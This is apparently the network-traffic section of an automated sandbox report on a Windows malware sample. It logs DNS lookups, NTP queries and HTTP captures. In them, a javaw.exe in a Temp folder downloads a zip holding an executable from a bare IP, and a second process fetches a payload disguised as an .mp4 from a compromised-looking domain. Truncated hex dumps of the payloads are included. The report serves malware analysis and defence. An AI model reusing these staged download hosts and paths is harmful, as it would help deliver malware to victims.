                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:14.061009884 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:14.061031103 CET798249959104.37.175.218192.168.2.5

                                                                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:35.631444931 CET5306153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:36.127140999 CET53530611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892153978 CET6443853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892488003 CET5408353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.894917011 CET6209053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.896636963 CET5113653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.897696972 CET5785253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.898921013 CET6352953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.034166098 CET53511361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.124727011 CET53635291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.288974047 CET53578521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.539417982 CET53620901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.666671038 CET53644381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.924690008 CET53540831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.927987099 CET5408353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945072889 CET63530123192.168.2.5213.239.239.164
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945135117 CET63530123192.168.2.594.198.159.10
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945225954 CET63530123192.168.2.5129.250.35.250
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945288897 CET63530123192.168.2.5194.58.203.20
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945352077 CET63530123192.168.2.5169.229.128.134
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945353985 CET63530123192.168.2.562.149.0.30
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:42.064918041 CET53540831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.031667948 CET12363530129.250.35.250192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.099066019 CET12363530169.229.128.134192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.106702089 CET1236353094.198.159.10192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.123066902 CET12363530194.58.203.20192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.123128891 CET12363530213.239.239.164192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.135974884 CET1236353062.149.0.30192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:50.392026901 CET53515641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:50.654002905 CET53646191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431107044 CET5075053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431237936 CET5887953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431571960 CET6071853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431735992 CET4969553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568259954 CET53507501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568341970 CET53588791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568604946 CET53607181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568986893 CET53496951.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                                                              ICMP Packets

                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:42.069057941 CET192.168.2.51.1.1.1c1fc(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:50.746054888 CET192.168.2.51.1.1.1c234(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:35.631444931 CET192.168.2.51.1.1.10xa90eStandard query (0)erdogansigorta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892153978 CET192.168.2.51.1.1.10x1dd5Standard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892488003 CET192.168.2.51.1.1.10x50f0Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.894917011 CET192.168.2.51.1.1.10x6ea0Standard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.896636963 CET192.168.2.51.1.1.10x19b0Standard query (0)x.ns.gin.ntt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.897696972 CET192.168.2.51.1.1.10xd8abStandard query (0)ntp.time.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.898921013 CET192.168.2.51.1.1.10xfcbfStandard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.927987099 CET192.168.2.51.1.1.10x50f0Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431107044 CET192.168.2.51.1.1.10xc265Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431237936 CET192.168.2.51.1.1.10xd059Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431571960 CET192.168.2.51.1.1.10x8a22Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431735992 CET192.168.2.51.1.1.10x977aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:36.127140999 CET1.1.1.1192.168.2.50xa90eNo error (0)erdogansigorta.com5.2.81.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.034166098 CET1.1.1.1192.168.2.50x19b0No error (0)x.ns.gin.ntt.net129.250.35.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.124727011 CET1.1.1.1192.168.2.50xfcbfNo error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.288974047 CET1.1.1.1192.168.2.50xd8abNo error (0)ntp.time.nl94.198.159.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.288974047 CET1.1.1.1192.168.2.50xd8abNo error (0)ntp.time.nl94.198.159.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.539417982 CET1.1.1.1192.168.2.50x6ea0No error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.539417982 CET1.1.1.1192.168.2.50x6ea0No error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.666671038 CET1.1.1.1192.168.2.50x1dd5No error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.924690008 CET1.1.1.1192.168.2.50x50f0No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:42.064918041 CET1.1.1.1192.168.2.50x50f0No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568259954 CET1.1.1.1192.168.2.50xc265No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568259954 CET1.1.1.1192.168.2.50xc265No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568341970 CET1.1.1.1192.168.2.50xd059No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568604946 CET1.1.1.1192.168.2.50x8a22No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568604946 CET1.1.1.1192.168.2.50x8a22No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568986893 CET1.1.1.1192.168.2.50x977aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                              • erdogansigorta.com
                                                                                                                                                                                                                                                                                                              • 77.238.245.43

                                                                                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              0192.168.2.54973077.238.245.43805908C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:32.275815010 CET181OUTGET /tamus/medicalanalysispro.zip HTTP/1.1
                                                                                                                                                                                                                                                                                                              User-Agent: Java/1.8.0_101
                                                                                                                                                                                                                                                                                                              Host: 77.238.245.43
                                                                                                                                                                                                                                                                                                              Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504648924 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 22:53:33 GMT
                                                                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 14:19:18 GMT
                                                                                                                                                                                                                                                                                                              ETag: "25a7f-6294fbfd8df7a"
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Content-Length: 154239
                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Content-Type: application/zip
                                                                                                                                                                                                                                                                                                              Data Raw: 50 4b 03 04 0a 00 00 00 00 00 68 25 8f 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2f 50 4b 03 04 14 00 00 00 08 00 40 25 8f 59 28 24 99 9b 11 59 02 00 00 26 03 00 29 00 00 00 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2f 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2e 65 78 65 ec bd 0b 7c 54 c5 f5 38 3e fb ca 6e 1e cb 0d 90 40 00 81 00 01 22 01 8c 04 24 21 89 64 93 5d d8 c5 0d 44 12 1e 62 90 84 3c 20 1a 92 35 d9 25 41 41 83 9b 48 c2 75 0b 5a b5 6a ad af 5a 4b 6d 6b b1 b5 05 a2 62 42 90 80 a0 20 f8 c0 a2 16 9f dd b8 56 a3 df 0a c1 07 f7 7f ce cc dc c7 26 c4 b6 bf ff ff ff f9 3f 7e 5d d8 9c 3b 67 66 ce 9c 39 73 e6 cc 99 d7 dd fc 55 3b 89 81 10 62 84 af 24 11 b2 97 b0 4f 0e f9 d7 9f 20 7c 87 8c 6f 1f 42 9e 8b 7c 75 c2 5e 9d fb d5 09 45 eb ab ea 13 3d 75 b5 eb ea 4a 37 24 96 95 d6 d4 d4 7a 13 d7 56 24 d6 f9 6a 12 ab 6a 12 ed 4b 0a 13 37 d4 96 57 cc b4 5a a3 92 38 0d fb e9 8b 15 64 df ce ab e4 6f dc c9 fb e6 ea 28 fc e9 5c [TRUNCATED]
                                                                                                                                                                                                                                                                                                              Data Ascii: PKh%Ymedicalanalysispro/PK@%Y($Y&)medicalanalysispro/medicalanalysispro.exe|T8>n@"$!d]Db< 5%AAHuZjZKmkbB V&?~];gf9sU;b$O |oB|u^E=uJ7$zV$jjK7WZ8do(\=Fs4w_?07X{hUe)~!wFcqd"#!!o,}QQ}#M*]Ia#z{/p(5<J*!B$pi3^dVf[2[J26XOHLc%u<0!>steW*+l#d.cH;Jt<ui\l9N9Nt-FKs7U:t!3`y1Gl_mvM:vLS[</vg6FW| 0)x#R},#^Kx8iy%dvb])3!}~iR)<#::CZ.S:@lrpn'%IW8'IN"N}X5a1X%9)wRJ4"(8pfv5X|rZBKX,"v;p8)V|m
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504663944 CET1236INData Raw: b9 73 eb e7 d8 5f 9d a2 29 11 fa 8f 33 ed a0 13 d8 f3 b8 c5 af 2a bb ed 49 d5 c4 94 f6 0f 67 c0 6a 6a 21 44 fc 01 b2 ac 87 f2 2d 4d bc 7c 27 34 45 4b 87 d0 fc 10 e6 0f c4 f7 36 23 ea 30 a4 98 a9 a6 e8 45 1d d8 e0 0c d8 93 4a 6c 6d 33 91 76 81 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: s_)3*Igjj!D-M|'4EK6#0EJlm3v=HRN'h=<%B?o2|W)&9|xHp'@oS=WnASxiOL;pV%^oJunXs}"`)5BKy9wn|'qI9 6G9{o~e#i-
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504674911 CET1236INData Raw: c7 2d b2 99 31 03 72 cf 16 5a 8a ca 24 70 6d f8 35 21 58 66 be f8 1a 2b a9 6d 73 52 22 16 77 03 58 ac 9e f7 75 38 a6 1d 61 8c 4c 36 a1 95 87 01 39 ed 08 d6 07 67 03 c1 bd 69 84 a4 75 f4 bc a4 d3 a8 45 4e 19 21 5a 7f a0 60 0b 53 0b 67 5b 11 d5 08
                                                                                                                                                                                                                                                                                                              Data Ascii: -1rZ$pm5!Xf+msR"wXu8aL69giuEN!Z`Sg[Z<&g`Oty%]8ZmkN_,g#XB!DC4x8x'1Xx5s+2ZJaz;ru?C-5}F(vJ
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504764080 CET1236INData Raw: 03 79 7a 6a 3e 46 2b 51 c7 e9 c8 f0 84 12 ee c2 c9 52 2a af 5a 7d 29 1b 13 0b 74 74 4c 44 d6 d7 f4 ab 53 c2 32 a7 f8 39 0c 89 25 69 67 2a 5b 8e 08 cd 23 21 4d a5 ff 02 38 b1 77 43 03 08 77 0e 61 61 83 b0 8d 6b 6f 42 db ea 58 db be 51 60 a1 e5 49
                                                                                                                                                                                                                                                                                                              Data Ascii: yzj>F+QR*Z})ttLDS29%ig*[#!M8wCwaakoBXQ`I=ApZ0]Ml1nDflKsI(Qc{dp6B@UV(NrD@t|Ju2AS\<"f00z\RGsEG\h$YvV<2k']
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504776001 CET1236INData Raw: da 59 0e 5f ee 7f 44 32 b9 1f 49 a7 e1 74 68 24 08 c2 37 8c 35 5a b2 b6 bf 50 b1 8c 50 31 7d db 09 c8 b6 65 17 34 fa 21 03 d1 7a 4e 19 2b 99 89 68 54 3d 27 70 08 6f 08 5f 53 b7 e0 3c 20 16 07 d8 54 da a2 17 80 fa ae 4a 4e 1d 7b 4d a3 33 2b a2 ce
                                                                                                                                                                                                                                                                                                              Data Ascii: Y_D2Ith$75ZPP1}e4!zN+hT='po_S< TJN{M3+nm]F=qyVhXz)>PNid}AZ.K\x9, 4=9`%>}:nz9)@7Bc]Q77y})t:lh;DGD6N3K
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504787922 CET1236INData Raw: cf 70 7e fa 99 ce 3b 75 eb 67 b4 af ce f2 7f 0b 93 37 0b f5 a7 60 fc 8a b0 05 0a be 0b c5 c0 b3 59 68 41 d3 07 3a 27 c5 47 ca 26 a1 e7 49 66 1e 13 4b c3 77 ba 63 13 d0 cf 36 bd 0e 0a d8 3e 5b d9 c6 fe 4c 61 2b 10 7f f1 31 19 eb 56 b0 34 b8 45 0e
                                                                                                                                                                                                                                                                                                              Data Ascii: p~;ug7`YhA:'G&IfKwc6>[La+1V4Ej2$:G~W9WLa[.c,5N)^wpz8bA`Ky[h-(-+&Sy$3Oyi=Khn'^\fl-.YO_0CA5$.
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504798889 CET1236INData Raw: 3e 87 5d 3c 65 17 cf 38 c7 c0 d0 7f f6 a0 db 70 36 bf ec 28 a8 e8 92 80 d1 95 97 19 77 b0 de 28 1e 0e 0d db 68 14 5f 0b c5 2c cc f4 1e 34 d6 7d 29 1e 15 7e d6 99 97 59 74 30 a6 0e 23 0e b1 88 d8 3a 93 d8 25 fc ac a3 e5 88 d0 fa 3b b6 2c b1 03 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: >]<e8p6(w(h_,4})~Yt0#:%;,=#8"ZeFpODwr{Knz[.V)6&ZyUv\]\st6+a~lAH}Li>$4oHzb'w#P%:D|A9h|3l7
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504816055 CET1236INData Raw: 4c 03 05 46 66 b4 6f 9e cf 8c 76 89 89 1a 6d 18 bf ea c1 70 df 9a 13 6e b4 a9 32 83 8e fe 74 33 1d ad 14 85 3e c2 14 ba 55 99 66 cd 92 0b 91 b7 67 87 ca 88 e0 cf ae c4 5a bf 09 f6 ac e7 16 d4 45 4e 32 79 69 38 c9 c3 8c 24 4e ed 42 ed 97 ea 44 dd
                                                                                                                                                                                                                                                                                                              Data Ascii: LFfovmpn2t3>UfgZEN2yi8$NBD,AE-wnH/b22f@-s3>Lyn7>l;~-C"Q#vw|V[TK,x>]O+"9gEQZ"j?Lt-f5w@ l rAu,=Hg)OO7m^
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504863024 CET1236INData Raw: 21 c7 97 d8 db 87 ba 93 72 10 51 20 b4 bc c7 16 19 71 6d 05 5d 64 8f 72 b5 d1 83 b5 39 22 ab 54 d3 66 40 f8 72 83 77 a5 52 63 24 04 ff 74 05 2e 19 c6 92 51 f4 ae 01 3e e9 70 3a 70 f6 4e 74 c8 8e b1 fd 7b 29 fe ca 05 4a 27 3c 2c f5 dc 8c 65 d1 2b
                                                                                                                                                                                                                                                                                                              Data Ascii: !rQ qm]dr9"Tf@rwRc$t.Q>p:pNt{)J'<,e+x]-akz.;_}x>Jmtfbkn"H=<XVLC{ 9<f`$23uC4vLy4H mQaN_
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.504874945 CET1236INData Raw: ba f3 a6 03 e5 69 27 5d e7 7b db e7 d1 b3 23 7a 23 0e 01 38 f2 ec cc e6 85 fc 48 25 15 9b 8d 7b e6 ce 40 f6 0b b8 52 00 ac fa 37 67 1a 75 be 78 50 13 63 26 bf 6d 9f 69 c1 3f b1 78 9d d0 9d 89 37 7e 5a e7 71 fa 78 90 d1 1b c9 53 86 0c b8 d7 88 43
                                                                                                                                                                                                                                                                                                              Data Ascii: i']{#z#8H%{@R7guxPc&mi?x7~ZqxSC>>5@`FD8R:1N\CAln])FbxH["=4-+&To%~B<>:z(\>;%uv?NOpm\xy^w%
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:33.624188900 CET1236INData Raw: 27 bf 7f fd 0f 68 28 53 bc 8f ed d8 c2 0c b5 42 34 fd ba 1a f5 f0 93 06 7e 50 f2 10 ae 14 76 ca 9b db f1 43 d9 6b 72 be 05 b1 07 ff 41 af e1 5b 3f 1d 09 cf 2f 8e 20 64 90 95 ee 43 ac c6 99 50 56 e8 61 79 83 3f bd 6b 90 75 f5 dd e9 b4 4f dc 0d b4
                                                                                                                                                                                                                                                                                                              Data Ascii: 'h(SB4~PvCkrA[?/ dCPVay?kuOLok.IA2q5Lz^QNKo1ipn sYqFF0D~n]Yataf]/?z$T[NPu\T?0OrzbU7_f


                                                                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              0192.168.2.5497365.2.81.1264435648C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:38 UTC84OUTGET /temp/Nomrwfj.mp4 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: erdogansigorta.com
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:38 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Type: video/mp4
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 12:38:32 GMT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              ETag: "2e747540ee4edb1:0"
                                                                                                                                                                                                                                                                                                              Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                              X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 22:53:38 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 1174536
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:38 UTC16084INData Raw: 87 61 cd 72 7a 4c a6 d8 2f 2c f4 91 1f e6 0c 7c 93 34 40 cc 1d 77 6d 95 4b ce 8a 8f 19 01 ad 8f 77 9e f5 7a 3b 8b f3 db 2d c0 f2 98 8f f4 db f1 5b e5 2c 92 cc 5e 50 46 ed 01 81 c7 f0 a7 31 b0 c9 a0 aa 58 04 ea ea eb 4b 83 78 d0 f6 a7 1a ad 43 49 93 fb 9b 99 18 1d da 01 7e 82 d2 c9 51 fb 10 51 44 18 e2 70 1f 4c 0e 46 0d e3 d4 9a 28 bd bf 25 4b 09 48 4b 87 a4 af 89 a9 db 97 1a 60 b5 60 07 2a 2c 5a ac 1d 9d 37 59 a2 32 1b 3f 40 64 a9 11 48 e0 69 c5 86 72 aa f5 c4 63 b2 c8 4a 92 7b 8c 9a 71 47 90 c2 58 b7 31 5f 7a 81 8d 96 94 12 fc 5d e1 79 59 a5 47 32 61 5d dd 65 e1 c4 c7 e9 0f 6b da 4d 13 2b 4e 68 08 dc fc 7b 49 fd bd 96 02 ba d7 7f 0e ea f7 ad 9d 58 39 08 77 dc 30 c5 3b 51 7d fc 5e b4 8d 2e 06 16 a6 e9 29 56 79 0e 41 5f 7a 30 84 0a 11 d0 1c 28 b9 f7 4c c7
                                                                                                                                                                                                                                                                                                              Data Ascii: arzL/,|4@wmKwz;-[,^PF1XKxCI~QQDpLF(%KHK``*,Z7Y2?@dHircJ{qGX1_z]yYG2a]ekM+Nh{IX9w0;Q}^.)VyA_z0(L
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:38 UTC16384INData Raw: 04 a9 bd c6 3d 44 82 27 9e 5c 93 d6 b8 30 70 02 e7 00 d0 c8 91 1e 76 fa 11 7d aa b2 5c d1 7d 10 42 b1 66 54 74 4b 9a 3e 92 f0 26 7c 9a d9 77 92 48 27 ae f4 5d 67 15 4a f7 c1 27 85 f7 c8 5b 1a 5b 0c 39 45 a3 bb 5c 3c 27 90 87 ee 35 1c 06 81 2e 44 36 b3 f2 70 8d 78 0a 6c 4a f6 f4 ba 2c 62 d1 a7 06 ed d5 f6 5e 46 7e 43 d8 52 8e 5e a7 ef 90 6b 82 04 6b e4 d1 70 1a b0 a4 9e 83 84 be d4 9b 8b 9c 14 11 6e 92 58 81 a3 bd 3b f6 0e 26 ec d9 fe 3e d8 e2 dc 0f 2a 2b 9e 17 e4 ca 9f 72 48 f9 d6 34 8e 52 e9 70 f6 0b b3 96 48 7f 39 f5 89 a5 a5 6c 76 f2 d7 1f e1 f6 20 10 61 36 6a 58 b6 dd 7c 81 70 bd 28 4d 99 8d e4 e2 03 5c 20 ca d4 49 cd 6d b3 15 4a 9e ae da b5 b3 92 12 13 39 99 9f 7f bf fe 97 9e 07 af e9 5e 63 8e d0 1e 1b 13 8d a2 b1 4e 1c 06 45 93 1f 6a fc 5f 96 db f2
                                                                                                                                                                                                                                                                                                              Data Ascii: =D'\0pv}\}BfTtK>&|wH']gJ'[[9E\<'5.D6pxlJ,b^F~CR^kkpnX;&>*+rH4RpH9lv a6jX|p(M\ ImJ9^cNEj_
                                                                                                                                                                                                                                                                                                              2024-12-22 22:53:39 UTC16384INData Raw: d2 2a a2 85 b1 76 9d 89 46 7e 23 2b 1f f3 f4 a0 da 60 46 13 e1 0d 4f ef c4 27 6b 36 80 80 3e 3b 78 bf f9 04 64 25 6b 90 3d df cd 01 39 2c 48 f9 2b d4 31 b1 a8 a8 3c cc 27 8a e2 75 c3 d7 82 6c 8e 1f 5c 39 15 ce bb 05 ec 21 1c 1e 8f 09 4d 3f ac 84 c6 57 2e d2 01 7c 3b ae 10 d7 43 51 5c a9 a4 5e d4 93 96 77 0c fe 3f ae bf 82 dd 0b f5 5a 0b 18 48 b1 fb 82 bd 6d c7 6e 37 fe b3 0e 47 97 df a2 f9 e7 f2 b9 c0 fc e9 41 0b ab c7 02 bf b0 a3 e2 9b f6 31 f7 d7 ef 5b cd b4 cd d1 fc 10 e4 11 e5 8a 38 f4 c1 17 f5 27 e9 17 33 7c 82 24 a3 ef 3e 84 ff b9 67 b5 d2 45 95 d1 fc ec 59 68 e4 be 12 03 a7 94 6a 0f cc 13 b5 89 85 0f 40 ab 34 95 78 bb 02 0d b7 d2 d8 48 c7 12 f9 f0 ee 51 f6 c3 09 ef 19 d1 06 aa 1c eb 93 d2 dc c5 01 e3 f5 63 cd 5d 82 59 5f 4d 32 fa 58 db 3f 7d 09 a6
                                                                                                                                                                                                                                                                                                              Data Ascii: *vF~#+`FO'k6>;xd%k=9,H+1<'ul\9!M?W.|;CQ\^w?ZHmn7GA1[8'3|$>gEYhj@4xHQc]Y_M2X?}
